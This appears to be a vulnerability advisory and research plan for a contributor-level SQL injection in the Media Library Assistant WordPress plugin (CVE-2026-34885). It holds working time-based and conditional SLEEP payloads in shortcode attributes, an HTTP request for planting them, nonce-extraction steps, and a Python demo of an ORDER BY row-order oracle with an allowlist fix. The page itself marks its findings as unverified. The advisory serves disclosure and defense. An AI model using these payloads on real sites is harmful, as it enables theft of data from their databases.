CVE-2026-34885

Media Library Assistant <= 3.34 - Authenticated (Contributor+) SQL Injection

Weakness: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSS Score: 6.5
Severity: Medium
Patched in: 3.35
Time to patch: 8d

Description

The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.34 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Technical Details

Affected versions: <= 3.34
Published: April 6, 2026
Last updated: April 13, 2026

What Changed in the Fix

Changes introduced in v3.35


Source Code

WordPress.org SVN
Research Plan
Unverified

This vulnerability is a classic Authenticated SQL Injection in the Media Library Assistant (MLA) plugin. The flaw resides in how the plugin handles specific shortcode attributes or AJAX parameters that influence the construction of SQL queries: parameters defining ORDER BY or WHERE clauses are concatenated into the query string without being passed through $wpdb->prepare() and without being validated as SQL identifiers. Note that value placeholders (%s, %d) alone cannot fix an ORDER BY term, because a bound value becomes a quoted literal rather than a column reference; the correct remediation is to validate each term against an allowlist of sortable columns (WordPress core provides sanitize_sql_orderby() for this, and $wpdb->prepare() has accepted the %i identifier placeholder since WordPress 6.2).

Authenticated attackers with Contributor-level permissions can exploit this by placing the injection inside shortcode attributes in posts they create. The injected SQL runs whenever the post is rendered; since a Contributor cannot publish, that means the post preview, or any higher-privileged user viewing the pending post.

1. Vulnerability Summary

  • Vulnerability: SQL Injection via unsanitized shortcode attributes or AJAX parameters.
  • Affected Version: <= 3.34.
  • Vulnerable Component: MLAArchiveList (shortcode handler) and potentially the MLAQuery engine.
  • Reason: The plugin builds SQL by concatenating user-supplied attributes (such as mla_item_orderby) into query strings handed to $wpdb methods, without validating the attribute as a sort identifier or using the WordPress database layer's preparation features (this is the static-analysis hypothesis; the sink has not yet been confirmed by a PoC).
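As an added illustration (not code from the Media Library Assistant plugin or from this page's research plan), the following Python script reproduces the point above with an in-memory SQLite database standing in for $wpdb: an ORDER BY term concatenated verbatim lets an attacker turn row order into a one-bit oracle on data they cannot otherwise read; binding the term as a value does not help, because identifiers cannot be parameterised; and an allowlist of sortable columns is the fix. The table and column names, the secrets table and its contents are constructed for the example.

```python
import sqlite3

# Columns a caller may sort by. Identifiers cannot be bound with a value
# placeholder, so an allowlist (WordPress: sanitize_sql_orderby()) is the fix.
ALLOWED_ORDERBY = {"ID", "post_title"}


def build_query_vulnerable(orderby: str) -> str:
    """The pattern the advisory describes: the attribute is concatenated verbatim."""
    return f"SELECT ID, post_title FROM posts ORDER BY {orderby}"


def build_query_allowlisted(orderby: str) -> str:
    """Accept only 'col [ASC|DESC]' terms whose column is in ALLOWED_ORDERBY."""
    terms = []
    for raw in orderby.split(","):
        parts = raw.strip().split()
        if len(parts) not in (1, 2) or parts[0] not in ALLOWED_ORDERBY:
            raise ValueError(f"rejected ORDER BY term: {raw.strip()!r}")
        direction = parts[1].upper() if len(parts) == 2 else "ASC"
        if direction not in ("ASC", "DESC"):
            raise ValueError(f"rejected sort direction: {parts[1]!r}")
        terms.append(f'"{parts[0]}" {direction}')
    return "SELECT ID, post_title FROM posts ORDER BY " + ", ".join(terms)


def accepts(orderby: str) -> bool:
    """True if the allowlisted builder accepts the term, False if it rejects it."""
    try:
        build_query_allowlisted(orderby)
        return True
    except ValueError:
        return False


def make_db() -> sqlite3.Connection:
    """Constructed data: a posts table the caller may read and a secrets table it may not."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (ID INTEGER PRIMARY KEY, post_title TEXT)")
    conn.execute("CREATE TABLE secrets (k TEXT PRIMARY KEY, v TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    conn.execute("INSERT INTO secrets VALUES ('db_version', '8.0.36')")
    return conn


def oracle_payload(condition: str) -> str:
    """ORDER BY injection needs no SLEEP(): flipping the sort direction on a
    condition leaks one bit per request through the order of the rows."""
    return f"(CASE WHEN ({condition}) THEN ID ELSE -ID END)"


def first_id(conn: sqlite3.Connection, sql: str) -> int:
    """ID of the first row the query returns; this is the oracle's observable."""
    return conn.execute(sql).fetchone()[0]


def bound_value_ids(conn: sqlite3.Connection, orderby: str) -> list:
    """What a naive value-placeholder 'fix' does: the attribute becomes a string
    literal, so nothing is injected, but ORDER BY 'ID' sorts by a constant and
    the order of the result is unspecified."""
    rows = conn.execute("SELECT ID FROM posts ORDER BY ?", (orderby,))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    secret_starts_with_8 = "(SELECT v FROM secrets WHERE k = 'db_version') LIKE '8%'"
    # Vulnerable builder: row order answers a question about the secrets table.
    print(first_id(db, build_query_vulnerable(oracle_payload(secret_starts_with_8))))
    print(first_id(db, build_query_vulnerable(oracle_payload("1 = 0"))))
    # Allowlisted builder: the payload never reaches the database.
    print(accepts(oracle_payload(secret_starts_with_8)), accepts("post_title DESC"))
    print(first_id(db, build_query_allowlisted("post_title DESC")))
```

The oracle form matters for detection as well as exploitation: an ORDER BY injection can be exploited silently without SLEEP(), so timing anomalies alone are not a sufficient signal in request logs.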

2. Attack Vector Analysis

  • Endpoint: Any frontend page or post where shortcodes are processed, or the admin-ajax.php endpoint.
  • Attack Surface: Shortcode attributes in [mla_archive_list] (introduced in 3.31) or [mla_gallery].
  • Required Role: Contributor or higher.
  • Payload Carrier: The mla_item_orderby or mla_item_where attribute within the shortcode.

3. Code Flow

  1. Entry Point: MLACore registers shortcodes (like [mla_archive_list]).
  2. Shortcode Handling: A user with edit_posts (Contributor) creates a post containing:
    [mla_archive_list mla_item_orderby="ID, (SELECT 1 FROM (SELECT SLEEP(5))A)"]
  3. Processing: MLAArchiveList (defined in includes/class-mla-shortcode-archive-list.php) parses these attributes.
  4. Query Construction: The attributes are passed to internal query functions (likely in MLAQuery, referenced in MLAData::initialize).
  5. SQL Sink: The unsanitized mla_item_orderby string is concatenated into an ORDER BY clause and executed via $wpdb->get_results().

4. Nonce Acquisition Strategy (If required for AJAX)

While the shortcode vector does not require a nonce, MLA AJAX actions like terms_search (defined by MLACore::MLA_ADMIN_TERMS_SEARCH) often do.

If the agent needs to exploit an AJAX action:

  1. Create a Page: MLA enqueues its media modal scripts when the media library or certain shortcodes are present.
    wp post create --post_type=page --post_status=publish --post_title="MLA Test" --post_content='[mla_gallery]'
    
  2. Navigate and Extract: Use browser_navigate to the new page.
  3. Extract Nonce: The nonce is stored in the mla_media_modal_vars object (defined in MLAModal::JAVASCRIPT_MEDIA_MODAL_OBJECT).
    // Use browser_eval
    window.mla_media_modal_vars?.mla_admin_nonce
    
  4. Verification: The action name associated with this nonce is mla_admin_nonce_action (from MLACore::MLA_ADMIN_NONCE_ACTION).

5. Exploitation Strategy (Shortcode Vector)

This is the most reliable path for a Contributor-level attacker.

  • Step 1: Authenticate as a Contributor.
  • Step 2: Create a Post with a time-based blind SQLi payload.
    • Action: Create post.
    • Content: [mla_archive_list mla_item_orderby="ID, (SELECT 1 FROM (SELECT SLEEP(5))A)"]
  • Step 3: Trigger Execution by viewing the post.
  • Step 4: Analyze Timing. A successful injection will cause a ~5-second delay in the response.

HTTP Request Details (the content value is shown unencoded for readability; in the real request the brackets, quotes, parentheses and spaces must be URL-encoded, and post_ID and _wpnonce are taken from the edit screen):

POST /wp-admin/post.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=editpost&post_ID=[POST_ID]&post_title=Exploit&content=[mla_archive_list+mla_item_orderby="ID,+(SELECT+1+FROM+(SELECT+SLEEP(5))A)"]&_wpnonce=[NONCE]&publish=Publish

For a Contributor the publish button only submits the post for review (pending status), so open the post preview to trigger the query.

6. Test Data Setup

  1. User: Create a Contributor user: wp user create attacker attacker@example.com --role=contributor --user_pass=password.
  2. Plugin State: Ensure MLA is active and Media Modal support is enabled (default).
    wp plugin activate media-library-assistant
    
  3. Media Items: Ensure at least one attachment exists in the library so the archive query has rows to process.
    wp media import https://wordpress.org/latest.zip --title="Test Item"
    

7. Expected Results

  • Unperturbed Request: A request to a page with [mla_archive_list] should return in < 500ms.
  • Exploited Request: A request to the same page with the malicious mla_item_orderby attribute should return in > 5000ms.
  • Error Logging: If WP_DEBUG is on, the MySQL error might show a syntax error if the injection is incorrectly terminated, confirming the input reached the query.

8. Verification Steps

After triggering the delay, prove data extraction (e.g. the first character of the database version) with a conditional payload:

  1. Modify the shortcode so that the condition gates the SLEEP() call itself. Do not wrap a derived table such as (SELECT SLEEP(5))A in a WHERE clause: the derived table is evaluated before the WHERE is applied, so that form delays regardless of the condition. The uncorrelated scalar subquery below is evaluated once rather than once per row:
    [mla_archive_list mla_item_orderby="ID, (SELECT IF(VERSION() LIKE '8%', SLEEP(5), 0))"]
  2. Verify that the delay happens only when the condition is true: repeat with a condition that is known to be false (e.g. VERSION() LIKE 'zzz%') and confirm the response time returns to the baseline.

9. Alternative Approaches

If mla_item_orderby is patched but mla_item_where is not:

  • Payload: [mla_archive_list mla_item_where="1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))A)"]

If shortcodes are disabled for Contributors:

  • AJAX Vector: Use the mla_admin_action=terms_search action.
    • URL: /wp-admin/admin-ajax.php
    • Parameters: action=mla-media-modal-scripts&mla_admin_action=terms_search&taxonomy=post_tag&search_string=test&mla_admin_nonce=[NONCE]
    • Injection Point: Inject into the taxonomy parameter if it's used to build the query dynamically.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Media Library Assistant plugin for WordPress is vulnerable to an authenticated SQL injection via shortcode attributes (such as mla_item_orderby or mla_item_where) in versions up to 3.34. Attackers with Contributor-level access or higher can exploit this by inserting malicious SQL clauses into shortcodes within posts, which are then concatenated into database queries without proper sanitization or preparation.

Vulnerable Code

The excerpts below are the header of the MLAArchiveList shortcode handler (showing only the start of its default attribute array) and the MLAData initializer; neither contains the ORDER BY or WHERE concatenation the summary describes, so the actual sink still has to be located in the query-building code.

// includes/class-mla-shortcode-archive-list.php line 17
class MLAArchiveList {
	/**
	 * These are the default parameters for archive list display
	 *
	 * @since 3.31
	 *
	 * @var	array
	 */
	private static $item_specific_arguments = array(
		'itemtag_id' => '',
		'itemtag_class' => 'archive-list-item',
		'itemtag_attributes' => '',
		'itemtag_value' => '',
		'itemtag_label' => '',

---

// includes/class-mla-data.php line 27
class MLAData {
	/**
	 * Initialization function, similar to __construct()
	 *
	 * @since 0.1
	 */
	public static function initialize() {
		// Moved to MLAQuery but retained here for example plugins.
		self::$search_parameters =& MLAQuery::$search_parameters;
		self::$query_parameters =& MLAQuery::$query_parameters;

		add_action( 'save_post', 'MLAData::mla_save_post_action', 10, 1);
		add_action( 'edit_attachment', 'MLAData::mla_save_post_action', 10, 1);
		add_action( 'add_attachment', 'MLAData::mla_save_post_action', 10, 1);
	}

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.34/includes/class-mla-core.php /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.35/includes/class-mla-core.php
--- /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.34/includes/class-mla-core.php	2026-03-07 00:56:28.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.35/includes/class-mla-core.php	2026-03-30 00:02:10.000000000 +0000
@@ -21,7 +21,7 @@
 	 *
 	 * @var	string
 	 */
-	const CURRENT_MLA_VERSION = '3.34';
+	const CURRENT_MLA_VERSION = '3.35';
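Review bot: the only change in this hunk is the CURRENT_MLA_VERSION bump from '3.34' to '3.35'; nothing here touches query construction, escaping or $wpdb->prepare(), so this diff does not evidence the fix the advisory describes. The 3.34 to 3.35 comparison should be extended to the files that build the ORDER BY and WHERE clauses (the plan points at includes/class-mla-shortcode-archive-list.php and the MLAQuery engine) so readers can see the actual neutralization change.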

Exploit Outline

The vulnerability can be exploited by an authenticated user with at least Contributor-level permissions. The attacker creates or edits a post and inserts a shortcode such as `[mla_archive_list]` or `[mla_gallery]`. Within the shortcode, the attacker provides a malicious SQL payload via attributes that influence the SQL query structure, specifically `mla_item_orderby` or `mla_item_where`. For example, a payload like `mla_item_orderby="ID, (SELECT 1 FROM (SELECT SLEEP(5))A)"` causes the database to pause for 5 seconds when the post is previewed (a Contributor cannot publish) or viewed by a higher-privileged user. Because these attributes are concatenated directly into the SQL statement without being processed by `$wpdb->prepare()` or validated against an allowlist of sort columns, the attacker can perform time-based blind SQL injection to extract sensitive information from the WordPress database.
